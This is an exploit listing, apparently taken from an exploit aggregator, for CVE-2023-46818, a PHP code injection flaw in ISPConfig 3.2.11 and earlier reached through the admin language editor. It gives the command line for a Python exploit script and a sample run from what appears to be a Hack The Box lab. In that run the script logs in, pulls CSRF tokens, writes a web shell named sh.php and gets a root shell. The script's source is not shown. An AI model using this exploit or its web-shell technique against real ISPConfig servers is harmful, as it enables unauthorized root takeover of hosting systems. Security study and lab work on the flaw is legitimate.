Exploit for Code Injection in Ispconfig CVE-2023-46818

## https://sploitus.com/exploit?id=80561D1C-E101-54D0-ACD4-C31A7AA94DAF
# CVE-2023-46818 Python Exploit

## 🔥 Description

This Python exploit script targets a security vulnerability in ISPConfig's `records` POST parameter to `/admin/language_edit.php`, which is not properly sanitized. This allows an authenticated admin to inject and execute arbitrary PHP code.

## ⚠️ Affected Versions

Version 3.2.11 and prior versions.

## ⚙️ Usage

```python
python3 CVE-2023-46818.py <URL> <Username> <Password>
```

## 💻 Sample Run
```shell
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...

ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell#
```


## ℹ️ Reference

https://seclists.org/fulldisclosure/2023/Dec/2

## ❤️ Credits

Shout out to Egidio Romano for this discovery.